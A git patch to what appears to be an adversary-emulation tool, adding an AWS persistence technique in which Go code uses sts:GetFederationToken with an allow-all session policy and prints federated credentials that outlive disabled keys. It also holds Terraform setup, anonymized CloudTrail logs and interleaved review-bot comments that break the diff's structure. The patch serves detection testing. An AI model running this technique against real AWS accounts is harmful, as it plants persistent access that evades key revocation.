From d57c50875d9853932dcdc5dc35120b7fa6e968b9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Adan=20=C3=81lvarez?=
Date: Wed, 4 Dec 2024 16:28:28 +0100
Subject: [PATCH] New attack technique: Persistence through federation (#604)
* add persistence sts federation token technique
* add documentation for sts federation token technique
* Cosmetic changes + logging improvements
* Add delay for eventual consistency
* terraform fmt
---------
Co-authored-by: Christophe Tafani-Dereeper
---
 .../aws.persistence.sts-federation-token.md | 158 ++++++++++++++++++
 docs/attack-techniques/AWS/index.md | 2 +
 docs/attack-techniques/list.md | 1 +
 .../aws.persistence.sts-federation-token.json | 91 ++++++++++
 docs/index.yaml | 7 +
 .../persistence/sts-federation-token/main.go | 121 ++++++++++++++
 .../persistence/sts-federation-token/main.tf | 76 +++++++++
 v2/internal/attacktechniques/main.go | 1 +
 8 files changed, 457 insertions(+)
 create mode 100755 docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md
 create mode 100644 docs/detonation-logs/aws.persistence.sts-federation-token.json
 create mode 100644 v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go
 create mode 100644 v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf
diff --git a/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md b/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md
new file mode 100755
index 00000000..91c80782
--- /dev/null
+++ b/docs/attack-techniques/AWS/aws.persistence.sts-federation-token.md
@@ -0,0 +1,158 @@
+---
+title: Generate temporary AWS credentials using GetFederationToken
+---
+
+# Generate temporary AWS credentials using GetFederationToken
+
+
+ idempotent
+
+Platform: AWS
+
+## MITRE ATT&CK Tactics
+
+
+- Persistence
+
+## Description
+
+
+Establishes persistence by generating new AWS temporary credentials through sts:GetFederationToken. The resulting credentials remain functional even if the original access keys are disabled.
+
+Warm-up:
+
+- Create an IAM user and generate a pair of access keys.
+
+Detonation:
+
+- Use the access keys from the IAM user to request temporary security credentials via sts:GetFederationToken.
+- Call sts:GetCallerIdentity using these new credentials.
+
+References:
+
+- https://docs.aws.amazon.com/STS/latest/APIReference/API_GetFederationToken.html
+- https://www.crowdstrike.com/en-us/blog/how-adversaries-persist-with-aws-user-federation/
+- https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+- https://fwdcloudsec.org/assets/presentations/2024/europe/sebastian-walla-cloud-conscious-tactics-techniques-and-procedures-an-overview.pdf
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate aws.persistence.sts-federation-token
+```
+## Detection
+
+
+Through CloudTrail's GetFederationToken event.
+
+
+
+## Detonation logs new!
+
+The following CloudTrail events are generated when this technique is detonated[^1]:
+
+
+- `sts:GetCallerIdentity`
+
+- `sts:GetFederationToken`
+
+
+??? "View raw detonation logs"
+
+ ```json hl_lines="6 51"
+
+ [
+ {
+ "awsRegion": "ap-isob-east-1r",
+ "eventCategory": "Management",
+ "eventID": "6e882b9d-2af8-4c67-b91f-aeac6a0e5e70",
+ "eventName": "GetFederationToken",
+ "eventSource": "sts.amazonaws.com",
+ "eventTime": "2024-11-30T08:43:17Z",
+ "eventType": "AwsApiCall",
+ "eventVersion": "1.08",
+ "managementEvent": true,
+ "readOnly": false,
+ "recipientAccountId": "742491224508",
+ "requestID": "e2de7fd1-2a86-4837-b15a-96fff1388061",
+ "requestParameters": {
+ "name": "stratus_red_team",
+ "policy": "{\n\t\t\"Version\": \"2012-10-17\",\n\t\t\"Statement\": [\n\t\t\t{\n\t\t\t\t\"Effect\": \"Allow\",\n\t\t\t\t\"Action\": \"*\",\n\t\t\t\t\"Resource\": \"*\"\n\t\t\t}\n\t\t]\n\t}"
+ },
+ "responseElements": {
+ "credentials": {
+ "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+ "expiration": "Nov 30, 2024, 8:43:17 PM",
+ "sessionToken": "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"
+ },
+ "federatedUser": {
+ "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+ "federatedUserId": "742491224508:stratus_red_team"
+ },
+ "packedPolicySize": 4
+ },
+ "sourceIPAddress": "255.090.254.5",
+ "tlsDetails": {
+ "cipherSuite": "TLS_AES_128_GCM_SHA256",
+ "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+ "tlsVersion": "TLSv1.3"
+ },
+ "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+ "userIdentity": {
+ "accessKeyId": "AKIA6V1GNZTT65XQH36M",
+ "accountId": "742491224508",
+ "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+ "principalId": "AIDAN7SEM6PEVTNQR8M4",
+ "type": "IAMUser",
+ "userName": "stratus-red-team-user-federation-user"
+ }
+ },
+ {
+ "awsRegion": "ap-isob-east-1r",
+ "eventCategory": "Management",
+ "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19",
+ "eventName": "GetCallerIdentity",
+ "eventSource": "sts.amazonaws.com",
+ "eventTime": "2024-11-30T08:43:18Z",
+ "eventType": "AwsApiCall",
+ "eventVersion": "1.08",
+ "managementEvent": true,
+ "readOnly": true,
+ "recipientAccountId": "742491224508",
+ "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65",
+ "requestParameters": null,
+ "responseElements": null,
+ "sourceIPAddress": "255.090.254.5",
+ "tlsDetails": {
+ "cipherSuite": "TLS_AES_128_GCM_SHA256",
+ "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+ "tlsVersion": "TLSv1.3"
+ },
+ "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+ "userIdentity": {
+ "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+ "accountId": "742491224508",
+ "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+ "principalId": "742491224508:stratus_red_team",
+ "sessionContext": {
+ "attributes": {
+ "creationDate": "2024-11-30T08:43:17Z",
+ "mfaAuthenticated": "false"
+ },
+ "sessionIssuer": {
+ "accountId": "742491224508",
+ "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+ "principalId": "AIDAN7SEM6PEVTNQR8M4",
+ "type": "IAMUser",
+ "userName": "stratus-red-team-user-federation-user"
+ },
+ "webIdFederationData": {}
+ },
+ "type": "FederatedUser"
+ }
+ }
+ ]
+ ```
+
+[^1]: These logs have been gathered from a real detonation of this technique in a test environment using [Grimoire](https://github.com/DataDog/grimoire), and anonymized using [LogLicker](https://github.com/Permiso-io-tools/LogLicker).
diff --git a/docs/attack-techniques/AWS/index.md b/docs/attack-techniques/AWS/index.md
index 5145dee1..de1861a9 100755
--- a/docs/attack-techniques/AWS/index.md
+++ b/docs/attack-techniques/AWS/index.md
@@ -110,6 +110,8 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 - [Create an IAM Roles Anywhere trust anchor](./aws.persistence.rolesanywhere-create-trust-anchor.md)
+- [Generate temporary AWS credentials using GetFederationToken](./aws.persistence.sts-federation-token.md)
+
 ## Privilege Escalation
diff --git a/docs/attack-techniques/list.md b/docs/attack-techniques/list.md
index 40d1f63e..4963a9e7 100755
--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -49,6 +49,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Add a Malicious Lambda Extension](./AWS/aws.persistence.lambda-layer-extension.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
 | [Overwrite Lambda Function Code](./AWS/aws.persistence.lambda-overwrite-code.md) | [AWS](./AWS/index.md) | Persistence |
 | [Create an IAM Roles Anywhere trust anchor](./AWS/aws.persistence.rolesanywhere-create-trust-anchor.md) | [AWS](./AWS/index.md) | Persistence, Privilege Escalation |
+| [Generate temporary AWS credentials using GetFederationToken](./AWS/aws.persistence.sts-federation-token.md) | [AWS](./AWS/index.md) | Persistence |
 | [Change IAM user password](./AWS/aws.privilege-escalation.iam-update-user-login-profile.md) | [AWS](./AWS/index.md) | Privilege Escalation |
 | [Execute Command on Virtual Machine using Custom Script Extension](./azure/azure.execution.vm-custom-script-extension.md) | [Azure](./azure/index.md) | Execution |
 | [Execute Commands on Virtual Machine using Run Command](./azure/azure.execution.vm-run-command.md) | [Azure](./azure/index.md) | Execution |
diff --git a/docs/detonation-logs/aws.persistence.sts-federation-token.json b/docs/detonation-logs/aws.persistence.sts-federation-token.json
new file mode 100644
index 00000000..eb1f061a
--- /dev/null
+++ b/docs/detonation-logs/aws.persistence.sts-federation-token.json
@@ -0,0 +1,91 @@
+[
+ {
+ "awsRegion": "ap-isob-east-1r",
+ "eventCategory": "Management",
+ "eventID": "6e882b9d-2af8-4c67-b91f-aeac6a0e5e70",
+ "eventName": "GetFederationToken",
+ "eventSource": "sts.amazonaws.com",
+ "eventTime": "2024-11-30T08:43:17Z",
+ "eventType": "AwsApiCall",
+ "eventVersion": "1.08",
+ "managementEvent": true,
+ "readOnly": false,
+ "recipientAccountId": "742491224508",
+ "requestID": "e2de7fd1-2a86-4837-b15a-96fff1388061",
+ "requestParameters": {
+ "name": "stratus_red_team",
+ "policy": "{\n\t\t\"Version\": \"2012-10-17\",\n\t\t\"Statement\": [\n\t\t\t{\n\t\t\t\t\"Effect\": \"Allow\",\n\t\t\t\t\"Action\": \"*\",\n\t\t\t\t\"Resource\": \"*\"\n\t\t\t}\n\t\t]\n\t}"
+ },
+ "responseElements": {
+ "credentials": {
+ "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+ "expiration": "Nov 30, 2024, 8:43:17 PM",
+ "sessionToken": "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"
+ },
+ "federatedUser": {
+ "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+ "federatedUserId": "742491224508:stratus_red_team"
+ },
+ "packedPolicySize": 4
+ },
+ "sourceIPAddress": "255.090.254.5",
+ "tlsDetails": {
+ "cipherSuite": "TLS_AES_128_GCM_SHA256",
+ "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+ "tlsVersion": "TLSv1.3"
+ },
+ "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+ "userIdentity": {
+ "accessKeyId": "AKIA6V1GNZTT65XQH36M",
+ "accountId": "742491224508",
+ "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+ "principalId": "AIDAN7SEM6PEVTNQR8M4",
+ "type": "IAMUser",
+ "userName": "stratus-red-team-user-federation-user"
+ }
+ },
+ {
+ "awsRegion": "ap-isob-east-1r",
+ "eventCategory": "Management",
+ "eventID": "91529247-c4c4-4793-afc8-d70bbcfe9d19",
+ "eventName": "GetCallerIdentity",
+ "eventSource": "sts.amazonaws.com",
+ "eventTime": "2024-11-30T08:43:18Z",
+ "eventType": "AwsApiCall",
+ "eventVersion": "1.08",
+ "managementEvent": true,
+ "readOnly": true,
+ "recipientAccountId": "742491224508",
+ "requestID": "037be419-9e9f-42e0-a38f-2a5d2ae1ce65",
+ "requestParameters": null,
+ "responseElements": null,
+ "sourceIPAddress": "255.090.254.5",
+ "tlsDetails": {
+ "cipherSuite": "TLS_AES_128_GCM_SHA256",
+ "clientProvidedHostHeader": "sts.ap-isob-east-1r.amazonaws.com",
+ "tlsVersion": "TLSv1.3"
+ },
+ "userAgent": "aws-sdk-go-v2/1.32.3 os/linux lang/go#1.23.1 md/GOOS#linux md/GOARCH#amd64 exec-env/grimoire_095724e3-1fa0-4e3e-b68a-e8581d194380 api/sts#1.26.2",
+ "userIdentity": {
+ "accessKeyId": "ASIASTJKC5GCM7ZE6LUP",
+ "accountId": "742491224508",
+ "arn": "arn:aws:sts::742491224508:federated-user/stratus_red_team",
+ "principalId": "742491224508:stratus_red_team",
+ "sessionContext": {
+ "attributes": {
+ "creationDate": "2024-11-30T08:43:17Z",
+ "mfaAuthenticated": "false"
+ },
+ "sessionIssuer": {
+ "accountId": "742491224508",
+ "arn": "arn:aws:iam::742491224508:user/stratus-red-team-user-federation-user",
+ "principalId": "AIDAN7SEM6PEVTNQR8M4",
+ "type": "IAMUser",
+ "userName": "stratus-red-team-user-federation-user"
+ },
+ "webIdFederationData": {}
+ },
+ "type": "FederatedUser"
+ }
+ }
+]
\ No newline at end of file
diff --git a/docs/index.yaml b/docs/index.yaml
index 5779854d..c3cef353 100644
--- a/docs/index.yaml
+++ b/docs/index.yaml
@@ -294,6 +294,13 @@ AWS:
 - Privilege Escalation
 platform: AWS
 isIdempotent: false
+ - id: aws.persistence.sts-federation-token
+ name: Generate temporary AWS credentials using GetFederationToken
+ isSlow: false
+ mitreAttackTactics:
+ - Persistence
+ platform: AWS
+ isIdempotent: true
 Privilege Escalation:
 - id: aws.execution.ec2-user-data
 name: Execute Commands on EC2 Instance via User Data
diff --git a/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go
new file mode 100644
index 00000000..ca441579
--- /dev/null
+++ b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.go
@@ -0,0 +1,121 @@
+package aws
+
+import (
+ "context"
+ _ "embed"
+ "fmt"
+ "github.com/aws/aws-sdk-go-v2/aws"
+ "github.com/aws/aws-sdk-go-v2/service/sts"
+ "github.com/datadog/stratus-red-team/v2/internal/utils"
+ "github.com/datadog/stratus-red-team/v2/pkg/stratus"
+ "github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack"
+ "log"
+ "math"
+ "time"
+)
+
+//go:embed main.tf
+var tf []byte
+
+func init() {
+ stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+ ID: "aws.persistence.sts-federation-token",
+ FriendlyName: "Generate temporary AWS credentials using GetFederationToken",
+ Description: `
+Establishes persistence by generating new AWS temporary credentials through sts:GetFederationToken. The resulting credentials remain functional even if the original access keys are disabled.
+
+Warm-up:
+
+- Create an IAM user and generate a pair of access keys.
+
+Detonation:
+
+- Use the access keys from the IAM user to request temporary security credentials via sts:GetFederationToken.
+- Call sts:GetCallerIdentity using these new credentials.
+
+References:
+
+- https://docs.aws.amazon.com/STS/latest/APIReference/API_GetFederationToken.html
+- https://www.crowdstrike.com/en-us/blog/how-adversaries-persist-with-aws-user-federation/
+- https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+- https://fwdcloudsec.org/assets/presentations/2024/europe/sebastian-walla-cloud-conscious-tactics-techniques-and-procedures-an-overview.pdf
+`,
+ Detection: `
+Through CloudTrail's GetFederationToken event.
+`,
+ Platform: stratus.AWS,
+ IsIdempotent: true,
+ MitreAttackTactics: []mitreattack.Tactic{mitreattack.Persistence},
+ PrerequisitesTerraformCode: tf,
+ Detonate: detonate,
+ })
+}
+
+const SessionPolicyAllowAll = `{
+ "Version": "2012-10-17",
+ "Statement": [
+ {
+ "Effect": "Allow",
+ "Action": "*",
+ "Resource": "*"
+ }
+ ]
+ }`
+
+const MinDelayBeforeCallingGetFederationToken = 10 * time.Second
+
+func detonate(params map[string]string, providers stratus.CloudProviders) error {
+ username := params["user_name"]
+ accessKeyID := params["access_key_id"]
+ secretAccessKey := params["secret_access_key"]
+
+ ensureEventualConsistency(params)
+
+ awsConfig := utils.AwsConfigFromCredentials(accessKeyID, secretAccessKey, "", &providers.AWS().UniqueCorrelationId)
+ stsClient := sts.NewFromConfig(awsConfig)
+ log.Println("Calling sts:GetFederationToken to generate temporary credentials")
+ federationTokenResult, err := stsClient.GetFederationToken(context.Background(), &sts.GetFederationTokenInput{
+ Name: aws.String("stratus-red-team"), // Note: This can be anything and is unrelated to the underlying IAM username
+ Policy: aws.String(SessionPolicyAllowAll),
+ })
+ if err != nil {
+ return fmt.Errorf("error getting federation token: %v", err)
+ }
+
+ log.Println("Successfully obtained federated credentials for user " + username)
+ tempCredentials := *federationTokenResult.Credentials
+ tempCredentialsConfig := utils.AwsConfigFromCredentials(
+ *tempCredentials.AccessKeyId,
+ *tempCredentials.SecretAccessKey,
+ *tempCredentials.SessionToken,
+ &providers.AWS().UniqueCorrelationId,
+ )
+ federatedStsClient := sts.NewFromConfig(tempCredentialsConfig)
+
+ log.Println("Calling sts:GetCallerIdentity with the newly-acquired federated credentials")
+ federatedCallerIdentity, err := federatedStsClient.GetCallerIdentity(context.Background(), &sts.GetCallerIdentityInput{})
+ if err != nil {
+ return fmt.Errorf("error getting caller identity with federated credentials: %v", err)
+ }
+ log.Println("Result:", *federatedCallerIdentity.Arn)
+ log.Println(`Here are the credentials below. Notice how they remain valid even if you disable the original access keys!
+
+export AWS_ACCESS_KEY_ID="` + *tempCredentials.AccessKeyId + `"
+export AWS_SECRET_ACCESS_KEY="` + *tempCredentials.SecretAccessKey + `"
+export AWS_SESSION_TOKEN="` + *tempCredentials.SessionToken + `"
+`)
+ return nil
+}
+
+func ensureEventualConsistency(params map[string]string) {
+ // Due to eventual consistency, we need to make sure at least a few seconds passed between when the access key is
+ // created and when we call GetFederationToken
+ createDate, _ := time.Parse(time.RFC3339, params["access_key_create_date"])
+ createdSecondsAgo := time.Since(createDate)
+ if createdSecondsAgo < MinDelayBeforeCallingGetFederationToken {
+ sleepTime := MinDelayBeforeCallingGetFederationToken - createdSecondsAgo
+ // print sleep time with 2 digits of precision
+ log.Printf("Waiting for %f seconds before calling GetFederationToken due to eventual consistency", math.Round(sleepTime.Seconds()*100)/100)
+ time.Sleep(sleepTime)
+ }
+}
diff --git a/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf
new file mode 100644
index 00000000..9664c8b1
--- /dev/null
+++ b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf
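Review bot: `ensureEventualConsistency` discards the `time.Parse` error (`createDate, _ := time.Parse(...)`), so a missing or malformed `access_key_create_date` parses to the zero time, `time.Since` returns a huge duration and the delay is silently skipped — the one situation the wait exists to cover. Treat an unparseable value as "just created" so the full delay applies: `createDate, err := time.Parse(time.RFC3339, params["access_key_create_date"])` followed by `if err != nil { createDate = time.Now() } // unknown creation time: assume just created and wait the full delay`. In the same function `%f` still prints six decimals (e.g. `9.870000`), so the comment's "2 digits of precision" needs `%.2f` with `sleepTime.Seconds()`, which also makes the `math.Round` call and the `math` import unnecessary. Separately, the detonation logs in this patch show the federation token name as `stratus_red_team` while the code passes `stratus-red-team`, presumably from an earlier run; regenerating the logs would keep the `federated-user/...` ARN correlatable with the code. The final `log.Println` intentionally prints the temporary secret key and session token for the operator, but any log shipping of stratus output then captures live AWS credentials valid until the token expires, which deserves a sentence in the Description text.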
@@ -0,0 +1,76 @@
+terraform {
+ required_providers {
+ aws = {
+ source = "hashicorp/aws"
+ version = "~> 3.0"
+ }
+ }
+}
+provider "aws" {
+ skip_region_validation = true
+ skip_credentials_validation = true
+ skip_get_ec2_platforms = true
+ default_tags {
+ tags = {
+ StratusRedTeam = true
+ }
+ }
+}
+
+locals {
+ resource_prefix = "stratus-red-team-user-federation"
+}
+
+resource "aws_iam_user" "legit-user" {
+ name = "${local.resource_prefix}-user"
+ force_destroy = true
+}
+
+data "aws_iam_policy_document" "legit-user-policy-document" {
+ statement {
+ effect = "Allow"
+ actions = [
+ "sts:GetFederationToken",
+ "iam:UpdateAccessKey",
+ "iam:ListAccessKeys"
+ ]
+ resources = ["*"]
+ }
+}
+
+resource "aws_iam_user_policy" "legit-user-policy" {
+ name = "test"
+ user = aws_iam_user.legit-user.name
+ policy = data.aws_iam_policy_document.legit-user-policy-document.json
+}
+
+resource "aws_iam_access_key" "inactive-credentials" {
+ user = aws_iam_user.legit-user.name
+ status = "Inactive"
+}
+
+resource "aws_iam_access_key" "active-credentials" {
+ user = aws_iam_user.legit-user.name
+ status = "Active"
+}
+
+output "user_name" {
+ value = aws_iam_user.legit-user.name
+}
+
+output "access_key_id" {
+ value = aws_iam_access_key.active-credentials.id
+}
+
+output "secret_access_key" {
+ value = aws_iam_access_key.active-credentials.secret
+ sensitive = true
+}
+
+output "display" {
+ value = format("IAM user %s ready", aws_iam_user.legit-user.name)
+}
+
+output "access_key_create_date" {
+ value = aws_iam_access_key.active-credentials.create_date
+}
\ No newline at end of file
diff --git a/v2/internal/attacktechniques/main.go b/v2/internal/attacktechniques/main.go
index be8acf48..1e9b2fc7 100644
--- a/v2/internal/attacktechniques/main.go
+++ b/v2/internal/attacktechniques/main.go
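Review bot: The warm-up user's inline policy grants `iam:UpdateAccessKey` and `iam:ListAccessKeys` on `resources = ["*"]`, so credentials that this technique deliberately leaves usable (the detonation prints them, and per GetFederationToken semantics the federated session inherits this policy) can disable or re-enable the access keys of every IAM user in the account, while the technique only needs to toggle its own. Move the IAM actions into their own statement scoped to `aws_iam_user.legit-user.arn`; `sts:GetFederationToken` can stay on `*` (I believe it also accepts the user ARN as a resource, but `*` is the safe default). The `inactive-credentials` key is never referenced by an output or by the Go code, so if it is meant as a decoy or to make the user look like it has rotated keys, a one-line comment saying so would stop the next reader from deleting it. A comment near the policy that the printed federated credentials are limited to the intersection of this policy and the `Allow *` session policy would also save readers a trip to the AWS docs.

```hcl
data "aws_iam_policy_document" "legit-user-policy-document" {
  statement {
    effect    = "Allow"
    actions   = ["sts:GetFederationToken"]
    resources = ["*"]
  }
  statement {
    # Least privilege: the technique only needs to list/disable its own keys,
    # not those of every IAM user in the account.
    effect    = "Allow"
    actions   = ["iam:UpdateAccessKey", "iam:ListAccessKeys"]
    resources = [aws_iam_user.legit-user.arn]
  }
}
```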
@@ -40,6 +40,7 @@ import (
 _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-backdoor-function"
 _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-layer-extension"
 _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-overwrite-code"
+ _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/sts-federation-token"
 _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/rolesanywhere-create-trust-anchor"
 _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/privilege-escalation/change-iam-user-password"
 _ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/azure/execution/vm-custom-script-extension"
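Review bot: The new blank import is inserted between `lambda-overwrite-code` and `rolesanywhere-create-trust-anchor`, which breaks the alphabetical order the surrounding lines keep (`sts-federation-token` sorts after `rolesanywhere-…`). As far as I recall gofmt sorts import specs within a block, so this ordering also suggests the file was not run through gofmt before the commit; moving the line one position down keeps the list sorted and stable under formatting.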